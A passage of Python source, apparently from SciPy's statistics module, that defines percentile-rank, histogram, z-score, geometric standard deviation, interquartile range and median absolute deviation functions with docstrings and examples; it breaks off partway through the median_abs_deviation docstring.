def percentileofscore(a, score, kind='rank'):
"""Compute the percentile rank of a score relative to a list of scores.
A `percentileofscore` of, for example, 80% means that 80% of the
scores in `a` are below the given score. In the case of gaps or
ties, the exact definition depends on the optional keyword, `kind`.
Parameters
----------
a : array_like
Array of scores to which `score` is compared.
score : int or float
Score that is compared to the elements in `a`.
kind : {'rank', 'weak', 'strict', 'mean'}, optional
Specifies the interpretation of the resulting score.
The following options are available (default is 'rank'):
* 'rank': Average percentage ranking of score. In case of multiple
matches, average the percentage rankings of all matching scores.
* 'weak': This kind corresponds to the definition of a cumulative
distribution function. A percentileofscore of 80% means that 80%
of values are less than or equal to the provided score.
* 'strict': Similar to "weak", except that only values that are
strictly less than the given score are counted.
* 'mean': The average of the "weak" and "strict" scores, often used
in testing. See https://en.wikipedia.org/wiki/Percentile_rank
Returns
-------
pcos : float
Percentile-position of score (0-100) relative to `a`.
See Also
--------
numpy.percentile
Examples
--------
Three-quarters of the given values lie below a given score:
>>> from scipy import stats
>>> stats.percentileofscore([1, 2, 3, 4], 3)
75.0
With multiple matches, note how the scores of the two matches, 0.6
and 0.8 respectively, are averaged:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3)
70.0
Only 2/5 values are strictly less than 3:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='strict')
40.0
But 4/5 values are less than or equal to 3:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='weak')
80.0
The average between the weak and the strict scores is:
>>> stats.percentileofscore([1, 2, 3, 3, 4], 3, kind='mean')
60.0
"""
if np.isnan(score):
return np.nan
a = np.asarray(a)
n = len(a)
if n == 0:
return 100.0
if kind == 'rank':
left = np.count_nonzero(a < score)
right = np.count_nonzero(a <= score)
pct = (right + left + (1 if right > left else 0)) * 50.0/n
return pct
elif kind == 'strict':
return np.count_nonzero(a < score) / n * 100
elif kind == 'weak':
return np.count_nonzero(a <= score) / n * 100
elif kind == 'mean':
pct = (np.count_nonzero(a < score)
+ np.count_nonzero(a <= score)) / n * 50
return pct
else:
raise ValueError("kind can only be 'rank', 'strict', 'weak' or 'mean'")
HistogramResult = namedtuple('HistogramResult',
('count', 'lowerlimit', 'binsize', 'extrapoints'))
def _histogram(a, numbins=10, defaultlimits=None, weights=None,
printextras=False):
"""Create a histogram.
Separate the range into several bins and return the number of instances
in each bin.
Parameters
----------
a : array_like
Array of scores which will be put into bins.
numbins : int, optional
The number of bins to use for the histogram. Default is 10.
defaultlimits : tuple (lower, upper), optional
The lower and upper values for the range of the histogram.
If no value is given, a range slightly larger than the range of the
values in a is used. Specifically ``(a.min() - s, a.max() + s)``,
where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
weights : array_like, optional
The weights for each value in `a`. Default is None, which gives each
value a weight of 1.0
printextras : bool, optional
If True, if there are extra points (i.e. the points that fall outside
the bin limits) a warning is raised saying how many of those points
there are. Default is False.
Returns
-------
count : ndarray
Number of points (or sum of weights) in each bin.
lowerlimit : float
Lowest value of histogram, the lower limit of the first bin.
binsize : float
The size of the bins (all bins have the same size).
extrapoints : int
The number of points outside the range of the histogram.
See Also
--------
numpy.histogram
Notes
-----
This histogram is based on numpy's histogram but has a larger range by
default if default limits is not set.
"""
a = np.ravel(a)
if defaultlimits is None:
if a.size == 0:
# handle empty arrays. Undetermined range, so use 0-1.
defaultlimits = (0, 1)
else:
# no range given, so use values in `a`
data_min = a.min()
data_max = a.max()
# Have bins extend past min and max values slightly
s = (data_max - data_min) / (2. * (numbins - 1.))
defaultlimits = (data_min - s, data_max + s)
# use numpy's histogram method to compute bins
hist, bin_edges = np.histogram(a, bins=numbins, range=defaultlimits,
weights=weights)
# hist are not always floats, convert to keep with old output
hist = np.array(hist, dtype=float)
# fixed width for bins is assumed, as numpy's histogram gives
# fixed width bins for int values for 'bins'
binsize = bin_edges[1] - bin_edges[0]
# calculate number of extra points
extrapoints = len([v for v in a
if defaultlimits[0] > v or v > defaultlimits[1]])
if extrapoints > 0 and printextras:
warnings.warn("Points outside given histogram range = %s"
% extrapoints)
return HistogramResult(hist, defaultlimits[0], binsize, extrapoints)
CumfreqResult = namedtuple('CumfreqResult',
('cumcount', 'lowerlimit', 'binsize',
'extrapoints'))
def cumfreq(a, numbins=10, defaultreallimits=None, weights=None):
"""Return a cumulative frequency histogram, using the histogram function.
A cumulative histogram is a mapping that counts the cumulative number of
observations in all of the bins up to the specified bin.
Parameters
----------
a : array_like
Input array.
numbins : int, optional
The number of bins to use for the histogram. Default is 10.
defaultreallimits : tuple (lower, upper), optional
The lower and upper values for the range of the histogram.
If no value is given, a range slightly larger than the range of the
values in `a` is used. Specifically ``(a.min() - s, a.max() + s)``,
where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
weights : array_like, optional
The weights for each value in `a`. Default is None, which gives each
value a weight of 1.0
Returns
-------
cumcount : ndarray
Binned values of cumulative frequency.
lowerlimit : float
Lower real limit
binsize : float
Width of each bin.
extrapoints : int
Extra points.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from numpy.random import default_rng
>>> from scipy import stats
>>> rng = default_rng()
>>> x = [1, 4, 2, 1, 3, 1]
>>> res = stats.cumfreq(x, numbins=4, defaultreallimits=(1.5, 5))
>>> res.cumcount
array([ 1., 2., 3., 3.])
>>> res.extrapoints
3
Create a normal distribution with 1000 random values
>>> samples = stats.norm.rvs(size=1000, random_state=rng)
Calculate cumulative frequencies
>>> res = stats.cumfreq(samples, numbins=25)
Calculate space of values for x
>>> x = res.lowerlimit + np.linspace(0, res.binsize*res.cumcount.size,
... res.cumcount.size)
Plot histogram and cumulative histogram
>>> fig = plt.figure(figsize=(10, 4))
>>> ax1 = fig.add_subplot(1, 2, 1)
>>> ax2 = fig.add_subplot(1, 2, 2)
>>> ax1.hist(samples, bins=25)
>>> ax1.set_title('Histogram')
>>> ax2.bar(x, res.cumcount, width=res.binsize)
>>> ax2.set_title('Cumulative histogram')
>>> ax2.set_xlim([x.min(), x.max()])
>>> plt.show()
"""
h, l, b, e = _histogram(a, numbins, defaultreallimits, weights=weights)
cumhist = np.cumsum(h * 1, axis=0)
return CumfreqResult(cumhist, l, b, e)
RelfreqResult = namedtuple('RelfreqResult',
('frequency', 'lowerlimit', 'binsize',
'extrapoints'))
def relfreq(a, numbins=10, defaultreallimits=None, weights=None):
"""Return a relative frequency histogram, using the histogram function.
A relative frequency histogram is a mapping of the number of
observations in each of the bins relative to the total of observations.
Parameters
----------
a : array_like
Input array.
numbins : int, optional
The number of bins to use for the histogram. Default is 10.
defaultreallimits : tuple (lower, upper), optional
The lower and upper values for the range of the histogram.
If no value is given, a range slightly larger than the range of the
values in a is used. Specifically ``(a.min() - s, a.max() + s)``,
where ``s = (1/2)(a.max() - a.min()) / (numbins - 1)``.
weights : array_like, optional
The weights for each value in `a`. Default is None, which gives each
value a weight of 1.0
Returns
-------
frequency : ndarray
Binned values of relative frequency.
lowerlimit : float
Lower real limit.
binsize : float
Width of each bin.
extrapoints : int
Extra points.
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from numpy.random import default_rng
>>> from scipy import stats
>>> rng = default_rng()
>>> a = np.array([2, 4, 1, 2, 3, 2])
>>> res = stats.relfreq(a, numbins=4)
>>> res.frequency
array([ 0.16666667, 0.5 , 0.16666667, 0.16666667])
>>> np.sum(res.frequency) # relative frequencies should add up to 1
1.0
Create a normal distribution with 1000 random values
>>> samples = stats.norm.rvs(size=1000, random_state=rng)
Calculate relative frequencies
>>> res = stats.relfreq(samples, numbins=25)
Calculate space of values for x
>>> x = res.lowerlimit + np.linspace(0, res.binsize*res.frequency.size,
... res.frequency.size)
Plot relative frequency histogram
>>> fig = plt.figure(figsize=(5, 4))
>>> ax = fig.add_subplot(1, 1, 1)
>>> ax.bar(x, res.frequency, width=res.binsize)
>>> ax.set_title('Relative frequency histogram')
>>> ax.set_xlim([x.min(), x.max()])
>>> plt.show()
"""
a = np.asanyarray(a)
h, l, b, e = _histogram(a, numbins, defaultreallimits, weights=weights)
h = h / a.shape[0]
return RelfreqResult(h, l, b, e)
#####################################
# VARIABILITY FUNCTIONS #
#####################################
def obrientransform(*args):
"""Compute the O'Brien transform on input data (any number of arrays).
Used to test for homogeneity of variance prior to running one-way stats.
Each array in ``*args`` is one level of a factor.
If `f_oneway` is run on the transformed data and found significant,
the variances are unequal. From Maxwell and Delaney [1]_, p.112.
Parameters
----------
*args : tuple of array_like
Any number of arrays.
Returns
-------
obrientransform : ndarray
Transformed data for use in an ANOVA. The first dimension
of the result corresponds to the sequence of transformed
arrays. If the arrays given are all 1-D of the same length,
the return value is a 2-D array; otherwise it is a 1-D array
of type object, with each element being an ndarray.
References
----------
.. [1] S. E. Maxwell and H. D. Delaney, "Designing Experiments and
Analyzing Data: A Model Comparison Perspective", Wadsworth, 1990.
Examples
--------
We'll test the following data sets for differences in their variance.
>>> x = [10, 11, 13, 9, 7, 12, 12, 9, 10]
>>> y = [13, 21, 5, 10, 8, 14, 10, 12, 7, 15]
Apply the O'Brien transform to the data.
>>> from scipy.stats import obrientransform
>>> tx, ty = obrientransform(x, y)
Use `scipy.stats.f_oneway` to apply a one-way ANOVA test to the
transformed data.
>>> from scipy.stats import f_oneway
>>> F, p = f_oneway(tx, ty)
>>> p
0.1314139477040335
If we require that ``p < 0.05`` for significance, we cannot conclude
that the variances are different.
"""
TINY = np.sqrt(np.finfo(float).eps)
# `arrays` will hold the transformed arguments.
arrays = []
sLast = None
for arg in args:
a = np.asarray(arg)
n = len(a)
mu = np.mean(a)
sq = (a - mu)**2
sumsq = sq.sum()
# The O'Brien transform.
t = ((n - 1.5) * n * sq - 0.5 * sumsq) / ((n - 1) * (n - 2))
# Check that the mean of the transformed data is equal to the
# original variance.
var = sumsq / (n - 1)
if abs(var - np.mean(t)) > TINY:
raise ValueError('Lack of convergence in obrientransform.')
arrays.append(t)
sLast = a.shape
if sLast:
for arr in arrays[:-1]:
if sLast != arr.shape:
return np.array(arrays, dtype=object)
return np.array(arrays)
def sem(a, axis=0, ddof=1, nan_policy='propagate'):
"""Compute standard error of the mean.
Calculate the standard error of the mean (or standard error of
measurement) of the values in the input array.
Parameters
----------
a : array_like
An array containing the values for which the standard error is
returned.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Delta degrees-of-freedom. How many degrees of freedom to adjust
for bias in limited samples relative to the population estimate
of variance. Defaults to 1.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
s : ndarray or float
The standard error of the mean in the sample(s), along the input axis.
Notes
-----
The default value for `ddof` is different to the default (0) used by other
ddof containing routines, such as np.std and np.nanstd.
Examples
--------
Find standard error along the first axis:
>>> from scipy import stats
>>> a = np.arange(20).reshape(5,4)
>>> stats.sem(a)
array([ 2.8284, 2.8284, 2.8284, 2.8284])
Find standard error across the whole array, using n degrees of freedom:
>>> stats.sem(a, axis=None, ddof=0)
1.2893796958227628
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.sem(a, axis, ddof)
n = a.shape[axis]
s = np.std(a, axis=axis, ddof=ddof) / np.sqrt(n)
return s
def _isconst(x):
"""
Check if all values in x are the same. nans are ignored.
x must be a 1d array.
The return value is a 1d array with length 1, so it can be used
in np.apply_along_axis.
"""
y = x[~np.isnan(x)]
if y.size == 0:
return np.array([True])
else:
return (y[0] == y).all(keepdims=True)
def _quiet_nanmean(x):
"""
Compute nanmean for the 1d array x, but quietly return nan if x is all nan.
The return value is a 1d array with length 1, so it can be used
in np.apply_along_axis.
"""
y = x[~np.isnan(x)]
if y.size == 0:
return np.array([np.nan])
else:
return np.mean(y, keepdims=True)
def _quiet_nanstd(x, ddof=0):
"""
Compute nanstd for the 1d array x, but quietly return nan if x is all nan.
The return value is a 1d array with length 1, so it can be used
in np.apply_along_axis.
"""
y = x[~np.isnan(x)]
if y.size == 0:
return np.array([np.nan])
else:
return np.std(y, keepdims=True, ddof=ddof)
def zscore(a, axis=0, ddof=0, nan_policy='propagate'):
"""
Compute the z score.
Compute the z score of each value in the sample, relative to the
sample mean and standard deviation.
Parameters
----------
a : array_like
An array like object containing the sample data.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Degrees of freedom correction in the calculation of the
standard deviation. Default is 0.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'. Note that when the value is 'omit',
nans in the input also propagate to the output, but they do not affect
the z-scores computed for the non-nan values.
Returns
-------
zscore : array_like
The z-scores, standardized by mean and standard deviation of
input array `a`.
Notes
-----
This function preserves ndarray subclasses, and works also with
matrices and masked arrays (it uses `asanyarray` instead of
`asarray` for parameters).
Examples
--------
>>> a = np.array([ 0.7972, 0.0767, 0.4383, 0.7866, 0.8091,
... 0.1954, 0.6307, 0.6599, 0.1065, 0.0508])
>>> from scipy import stats
>>> stats.zscore(a)
array([ 1.1273, -1.247 , -0.0552, 1.0923, 1.1664, -0.8559, 0.5786,
0.6748, -1.1488, -1.3324])
Computing along a specified axis, using n-1 degrees of freedom
(``ddof=1``) to calculate the standard deviation:
>>> b = np.array([[ 0.3148, 0.0478, 0.6243, 0.4608],
... [ 0.7149, 0.0775, 0.6072, 0.9656],
... [ 0.6341, 0.1403, 0.9759, 0.4064],
... [ 0.5918, 0.6948, 0.904 , 0.3721],
... [ 0.0921, 0.2481, 0.1188, 0.1366]])
>>> stats.zscore(b, axis=1, ddof=1)
array([[-0.19264823, -1.28415119, 1.07259584, 0.40420358],
[ 0.33048416, -1.37380874, 0.04251374, 1.00081084],
[ 0.26796377, -1.12598418, 1.23283094, -0.37481053],
[-0.22095197, 0.24468594, 1.19042819, -1.21416216],
[-0.82780366, 1.4457416 , -0.43867764, -0.1792603 ]])
An example with `nan_policy='omit'`:
>>> x = np.array([[25.11, 30.10, np.nan, 32.02, 43.15],
... [14.95, 16.06, 121.25, 94.35, 29.81]])
>>> stats.zscore(x, axis=1, nan_policy='omit')
array([[-1.13490897, -0.37830299, nan, -0.08718406, 1.60039602],
[-0.91611681, -0.89090508, 1.4983032 , 0.88731639, -0.5785977 ]])
"""
return zmap(a, a, axis=axis, ddof=ddof, nan_policy=nan_policy)
def gzscore(a, *, axis=0, ddof=0, nan_policy='propagate'):
"""
Compute the geometric standard score.
Compute the geometric z score of each strictly positive value in the
sample, relative to the geometric mean and standard deviation.
Mathematically the geometric z score can be evaluated as::
gzscore = log(a/gmu) / log(gsigma)
where ``gmu`` (resp. ``gsigma``) is the geometric mean (resp. standard
deviation).
Parameters
----------
a : array_like
Sample data.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Degrees of freedom correction in the calculation of the
standard deviation. Default is 0.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'. Note that when the value is 'omit',
nans in the input also propagate to the output, but they do not affect
the geometric z scores computed for the non-nan values.
Returns
-------
gzscore : array_like
The geometric z scores, standardized by geometric mean and geometric
standard deviation of input array `a`.
See Also
--------
gmean : Geometric mean
gstd : Geometric standard deviation
zscore : Standard score
Notes
-----
This function preserves ndarray subclasses, and works also with
matrices and masked arrays (it uses ``asanyarray`` instead of
``asarray`` for parameters).
.. versionadded:: 1.8
Examples
--------
Draw samples from a log-normal distribution:
>>> from scipy.stats import zscore, gzscore
>>> import matplotlib.pyplot as plt
>>> rng = np.random.default_rng()
>>> mu, sigma = 3., 1. # mean and standard deviation
>>> x = rng.lognormal(mu, sigma, size=500)
Display the histogram of the samples:
>>> fig, ax = plt.subplots()
>>> ax.hist(x, 50)
>>> plt.show()
Display the histogram of the samples standardized by the classical zscore.
Distribution is rescaled but its shape is unchanged.
>>> fig, ax = plt.subplots()
>>> ax.hist(zscore(x), 50)
>>> plt.show()
Demonstrate that the distribution of geometric zscores is rescaled and
quasinormal:
>>> fig, ax = plt.subplots()
>>> ax.hist(gzscore(x), 50)
>>> plt.show()
"""
a = np.asanyarray(a)
log = ma.log if isinstance(a, ma.MaskedArray) else np.log
return zscore(log(a), axis=axis, ddof=ddof, nan_policy=nan_policy)
def zmap(scores, compare, axis=0, ddof=0, nan_policy='propagate'):
"""
Calculate the relative z-scores.
Return an array of z-scores, i.e., scores that are standardized to
zero mean and unit variance, where mean and variance are calculated
from the comparison array.
Parameters
----------
scores : array_like
The input for which z-scores are calculated.
compare : array_like
The input from which the mean and standard deviation of the
normalization are taken; assumed to have the same dimension as
`scores`.
axis : int or None, optional
Axis over which mean and variance of `compare` are calculated.
Default is 0. If None, compute over the whole array `scores`.
ddof : int, optional
Degrees of freedom correction in the calculation of the
standard deviation. Default is 0.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle the occurrence of nans in `compare`.
'propagate' returns nan, 'raise' raises an exception, 'omit'
performs the calculations ignoring nan values. Default is
'propagate'. Note that when the value is 'omit', nans in `scores`
also propagate to the output, but they do not affect the z-scores
computed for the non-nan values.
Returns
-------
zscore : array_like
Z-scores, in the same shape as `scores`.
Notes
-----
This function preserves ndarray subclasses, and works also with
matrices and masked arrays (it uses `asanyarray` instead of
`asarray` for parameters).
Examples
--------
>>> from scipy.stats import zmap
>>> a = [0.5, 2.0, 2.5, 3]
>>> b = [0, 1, 2, 3, 4]
>>> zmap(a, b)
array([-1.06066017, 0. , 0.35355339, 0.70710678])
"""
a = np.asanyarray(compare)
if a.size == 0:
return np.empty(a.shape)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
if axis is None:
mn = _quiet_nanmean(a.ravel())
std = _quiet_nanstd(a.ravel(), ddof=ddof)
isconst = _isconst(a.ravel())
else:
mn = np.apply_along_axis(_quiet_nanmean, axis, a)
std = np.apply_along_axis(_quiet_nanstd, axis, a, ddof=ddof)
isconst = np.apply_along_axis(_isconst, axis, a)
else:
mn = a.mean(axis=axis, keepdims=True)
std = a.std(axis=axis, ddof=ddof, keepdims=True)
if axis is None:
isconst = (a.item(0) == a).all()
else:
isconst = (_first(a, axis) == a).all(axis=axis, keepdims=True)
# Set std deviations that are 0 to 1 to avoid division by 0.
std[isconst] = 1.0
z = (scores - mn) / std
# Set the outputs associated with a constant input to nan.
z[np.broadcast_to(isconst, z.shape)] = np.nan
return z
def gstd(a, axis=0, ddof=1):
"""
Calculate the geometric standard deviation of an array.
The geometric standard deviation describes the spread of a set of numbers
where the geometric mean is preferred. It is a multiplicative factor, and
so a dimensionless quantity.
It is defined as the exponent of the standard deviation of ``log(a)``.
Mathematically the population geometric standard deviation can be
evaluated as::
gstd = exp(std(log(a)))
.. versionadded:: 1.3.0
Parameters
----------
a : array_like
An array like object containing the sample data.
axis : int, tuple or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Degree of freedom correction in the calculation of the
geometric standard deviation. Default is 1.
Returns
-------
ndarray or float
An array of the geometric standard deviation. If `axis` is None or `a`
is a 1d array a float is returned.
See Also
--------
gmean : Geometric mean
numpy.std : Standard deviation
Notes
-----
As the calculation requires the use of logarithms the geometric standard
deviation only supports strictly positive values. Any non-positive or
infinite values will raise a `ValueError`.
The geometric standard deviation is sometimes confused with the exponent of
the standard deviation, ``exp(std(a))``. Instead the geometric standard
deviation is ``exp(std(log(a)))``.
The default value for `ddof` is different to the default value (0) used
by other ddof containing functions, such as ``np.std`` and ``np.nanstd``.
References
----------
.. [1] Kirkwood, T. B., "Geometric means and measures of dispersion",
Biometrics, vol. 35, pp. 908-909, 1979
Examples
--------
Find the geometric standard deviation of a log-normally distributed sample.
Note that the standard deviation of the distribution is one, on a
log scale this evaluates to approximately ``exp(1)``.
>>> from scipy.stats import gstd
>>> rng = np.random.default_rng()
>>> sample = rng.lognormal(mean=0, sigma=1, size=1000)
>>> gstd(sample)
2.810010162475324
Compute the geometric standard deviation of a multidimensional array and
of a given axis.
>>> a = np.arange(1, 25).reshape(2, 3, 4)
>>> gstd(a, axis=None)
2.2944076136018947
>>> gstd(a, axis=2)
array([[1.82424757, 1.22436866, 1.13183117],
[1.09348306, 1.07244798, 1.05914985]])
>>> gstd(a, axis=(1,2))
array([2.12939215, 1.22120169])
The geometric standard deviation further handles masked arrays.
>>> a = np.arange(1, 25).reshape(2, 3, 4)
>>> ma = np.ma.masked_where(a > 16, a)
>>> ma
masked_array(
data=[[[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]],
[[13, 14, 15, 16],
[--, --, --, --],
[--, --, --, --]]],
mask=[[[False, False, False, False],
[False, False, False, False],
[False, False, False, False]],
[[False, False, False, False],
[ True, True, True, True],
[ True, True, True, True]]],
fill_value=999999)
>>> gstd(ma, axis=2)
masked_array(
data=[[1.8242475707663655, 1.2243686572447428, 1.1318311657788478],
[1.0934830582350938, --, --]],
mask=[[False, False, False],
[False, True, True]],
fill_value=999999)
"""
a = np.asanyarray(a)
log = ma.log if isinstance(a, ma.MaskedArray) else np.log
try:
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
return np.exp(np.std(log(a), axis=axis, ddof=ddof))
except RuntimeWarning as w:
if np.isinf(a).any():
raise ValueError(
'Infinite value encountered. The geometric standard deviation '
'is defined for strictly positive values only.'
) from w
a_nan = np.isnan(a)
a_nan_any = a_nan.any()
# exclude NaN's from negativity check, but
# avoid expensive masking for arrays with no NaN
if ((a_nan_any and np.less_equal(np.nanmin(a), 0)) or
(not a_nan_any and np.less_equal(a, 0).any())):
raise ValueError(
'Non positive value encountered. The geometric standard '
'deviation is defined for strictly positive values only.'
) from w
elif 'Degrees of freedom <= 0 for slice' == str(w):
raise ValueError(w) from w
else:
# Remaining warnings don't need to be exceptions.
return np.exp(np.std(log(a, where=~a_nan), axis=axis, ddof=ddof))
except TypeError as e:
raise ValueError(
'Invalid array input. The inputs could not be '
'safely coerced to any supported types') from e
# Private dictionary initialized only once at module level
# See https://en.wikipedia.org/wiki/Robust_measures_of_scale
_scale_conversions = {'raw': 1.0,
'normal': special.erfinv(0.5) * 2.0 * math.sqrt(2.0)}
def iqr(x, axis=None, rng=(25, 75), scale=1.0, nan_policy='propagate',
interpolation='linear', keepdims=False):
r"""
Compute the interquartile range of the data along the specified axis.
The interquartile range (IQR) is the difference between the 75th and
25th percentile of the data. It is a measure of the dispersion
similar to standard deviation or variance, but is much more robust
against outliers [2]_.
The ``rng`` parameter allows this function to compute other
percentile ranges than the actual IQR. For example, setting
``rng=(0, 100)`` is equivalent to `numpy.ptp`.
The IQR of an empty array is `np.nan`.
.. versionadded:: 0.18.0
Parameters
----------
x : array_like
Input array or object that can be converted to an array.
axis : int or sequence of int, optional
Axis along which the range is computed. The default is to
compute the IQR for the entire array.
rng : Two-element sequence containing floats in range of [0,100] optional
Percentiles over which to compute the range. Each must be
between 0 and 100, inclusive. The default is the true IQR:
``(25, 75)``. The order of the elements is not important.
scale : scalar or str, optional
The numerical value of scale will be divided out of the final
result. The following string values are recognized:
* 'raw' : No scaling, just return the raw IQR.
**Deprecated!** Use ``scale=1`` instead.
* 'normal' : Scale by
:math:`2 \sqrt{2} erf^{-1}(\frac{1}{2}) \approx 1.349`.
The default is 1.0. The use of ``scale='raw'`` is deprecated.
Array-like `scale` is also allowed, as long
as it broadcasts correctly to the output such that
``out / scale`` is a valid operation. The output dimensions
depend on the input array, `x`, the `axis` argument, and the
`keepdims` flag.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
interpolation : str, optional
Specifies the interpolation method to use when the percentile
boundaries lie between two data points ``i`` and ``j``.
The following options are available (default is 'linear'):
* 'linear': ``i + (j - i)*fraction``, where ``fraction`` is the
fractional part of the index surrounded by ``i`` and ``j``.
* 'lower': ``i``.
* 'higher': ``j``.
* 'nearest': ``i`` or ``j`` whichever is nearest.
* 'midpoint': ``(i + j)/2``.
For NumPy >= 1.22.0, the additional options provided by the ``method``
keyword of `numpy.percentile` are also valid.
keepdims : bool, optional
If this is set to True, the reduced axes are left in the
result as dimensions with size one. With this option, the result
will broadcast correctly against the original array `x`.
Returns
-------
iqr : scalar or ndarray
If ``axis=None``, a scalar is returned. If the input contains
integers or floats of smaller precision than ``np.float64``, then the
output data-type is ``np.float64``. Otherwise, the output data-type is
the same as that of the input.
See Also
--------
numpy.std, numpy.var
References
----------
.. [1] "Interquartile range" https://en.wikipedia.org/wiki/Interquartile_range
.. [2] "Robust measures of scale" https://en.wikipedia.org/wiki/Robust_measures_of_scale
.. [3] "Quantile" https://en.wikipedia.org/wiki/Quantile
Examples
--------
>>> from scipy.stats import iqr
>>> x = np.array([[10, 7, 4], [3, 2, 1]])
>>> x
array([[10, 7, 4],
[ 3, 2, 1]])
>>> iqr(x)
4.0
>>> iqr(x, axis=0)
array([ 3.5, 2.5, 1.5])
>>> iqr(x, axis=1)
array([ 3., 1.])
>>> iqr(x, axis=1, keepdims=True)
array([[ 3.],
[ 1.]])
"""
x = asarray(x)
# This check prevents percentile from raising an error later. Also, it is
# consistent with `np.var` and `np.std`.
if not x.size:
return np.nan
# An error may be raised here, so fail-fast, before doing lengthy
# computations, even though `scale` is not used until later
if isinstance(scale, str):
scale_key = scale.lower()
if scale_key not in _scale_conversions:
raise ValueError("{0} not a valid scale for `iqr`".format(scale))
if scale_key == 'raw':
warnings.warn(
"use of scale='raw' is deprecated, use scale=1.0 instead",
np.VisibleDeprecationWarning
)
scale = _scale_conversions[scale_key]
# Select the percentile function to use based on nans and policy
contains_nan, nan_policy = _contains_nan(x, nan_policy)
if contains_nan and nan_policy == 'omit':
percentile_func = np.nanpercentile
else:
percentile_func = np.percentile
if len(rng) != 2:
raise TypeError("quantile range must be two element sequence")
if np.isnan(rng).any():
raise ValueError("range must not contain NaNs")
rng = sorted(rng)
if NumpyVersion(np.__version__) >= '1.22.0':
pct = percentile_func(x, rng, axis=axis, method=interpolation,
keepdims=keepdims)
else:
pct = percentile_func(x, rng, axis=axis, interpolation=interpolation,
keepdims=keepdims)
out = np.subtract(pct[1], pct[0])
if scale != 1.0:
out /= scale
return out
def _mad_1d(x, center, nan_policy):
# Median absolute deviation for 1-d array x.
# This is a helper function for `median_abs_deviation`; it assumes its
# arguments have been validated already. In particular, x must be a
# 1-d numpy array, center must be callable, and if nan_policy is not
# 'propagate', it is assumed to be 'omit', because 'raise' is handled
# in `median_abs_deviation`.
# No warning is generated if x is empty or all nan.
isnan = np.isnan(x)
if isnan.any():
if nan_policy == 'propagate':
return np.nan
x = x[~isnan]
if x.size == 0:
# MAD of an empty array is nan.
return np.nan
# Edge cases have been handled, so do the basic MAD calculation.
med = center(x)
mad = np.median(np.abs(x - med))
return mad
def median_abs_deviation(x, axis=0, center=np.median, scale=1.0,
nan_policy='propagate'):
r"""
Compute the median absolute deviation of the data along the given axis.
The median absolute deviation (MAD, [1]_) computes the median over the
absolute deviations from the median. It is a measure of dispersion
similar to the standard deviation but more robust to outliers [2]_.
The MAD of an empty array is ``np.nan``.
.. versionadded:: 1.5.0
Parameters
----------
x : array_like
Input array or object that can be converted to an array.
axis : int or None, optional
Axis along which the range is computed. Default is 0. If None, compute
the MAD over the entire array.
center : callable, optional
A function that will return the central value. The default is to use
np.median. Any user defined function used will need to have the
function signature ``func(arr, axis)``.
scale : scalar or str, optional
The numerical value of scale will be divided out of the final
result. The default is 1.0. The string "normal" is also accepted,
and results in `scale` being the inverse of the standard normal
quantile function at 0.75, which is approximately 0.67449.
Array-like scale is also allowed, as long as it broadcasts correctly
to the output such that ``out / scale`` is a valid operation. The
output dimensions depend on the input array, `x`, and the `axis`
argument.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
mad : scalar or ndarray
If ``axis=None``, a scalar is returned. If the input contains
integers or floats of smaller precision than ``np.float64``, then the
output data-type is ``np.float64``. Otherwise, the output data-type is
the same as that of the input.
See Also
--------
numpy.std, numpy.var, numpy.median, scipy.stats.iqr, scipy.stats.tmean,
scipy.stats.tstd, scipy.stats.tvar
Notes
-----
The `center` argument only affects the calculation of the central value
around which the MAD is calculated. That is, passing in ``center=np.mean``
will calculate the MAD around the mean - it will not calculate the *mean*
absolute deviation.
The input array may contain `inf`, but if `center` returns `inf`, the
corresponding MAD for that data will be `nan`.
References
----------
.. [1] "Median absolute deviation",
https://en.wikipedia.org/wiki/Median_absolute_deviation
.. [2] "Robust measures of scale",
https://en.wikipedia.org/wiki/Robust_measures_of_scale
Examples
--------
When comparing the behavior of `median_abs_deviation` with ``np.std``,
the latter is affected when we change a single value of an array to have an
outlier value while the MAD hardly changes:
>>> from scipy import stats
>>> x = stats.norm.rvs(size=100, scale=1, random_state=123456)
>>> x.std()
0.9973906394005013
>>> stats.median_abs_deviation(x)
0.82832610097857
>>> x[0] = 345.6
>>> x.std()
34.42304872314415
>>> stats.median_abs_deviation(x)
0.8323442311590675
Axis handling example:
>>> x = np.array([[10, 7, 4], [3, 2, 1]])
>>> x
array([[10, 7, 4],
[ 3, 2, 1]])
>>> stats.median_abs_deviation(x)
array([3.5, 2.5, 1.5])
>>> stats.median_abs_deviation(x, axis=None)
2.0
